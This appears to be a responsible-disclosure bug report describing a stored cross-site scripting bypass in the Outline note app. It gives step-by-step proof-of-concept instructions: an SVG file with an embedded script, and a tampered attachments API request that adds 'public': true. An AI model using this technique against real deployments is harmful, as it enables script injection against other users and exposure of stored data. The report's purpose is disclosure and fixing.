[Bypass] Cross-site Scriptin (XSS) via file upload in outline/outline
Reported on
Jul 17th 2022
🔒️ Requirements
Privileges: User.
📝 Description
I found a bypass to this report by uploading the file with "public": true, parameter. This is due to the fact that AWS bucket public folder does not auto download files when we access them.
🕵️♂️ Proof of Concept
Step 1: Go your outline home and create a new note.
Step 2: Start burp suite with proxy -> Intercept is on.
Step 3: Add in the note, the following .svg file by taping /file and [ENTER].
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert("XSS");
</script>
</svg>
Step 4: On burp suite, press Forward until you see:
POST /api/attachments.create HTTP/1.1
Host: esaipslack.getoutline.com
Content-Length: 111
...
Connection: close
{
"documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca","contentType": "image/svg+xml",
"size":129,
"name":"xss.svg"
}
Step 5: Add "public": true, inside the JSON.
{
"public": true,
"documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
"contentType": "image/svg+xml",
"size": 129,
"name": "xss.svg"
}
Step 6: Forward and turn Intercept to off.
Step 7: Go to your note and click to the file.
- File
- XSS
🔨 Fix
To fix this vulnerability, I suggest you to force download on the public part of the AWS bucket too.
Impact
An attacker could use it to get sensitive information stored in the AWS bucket.
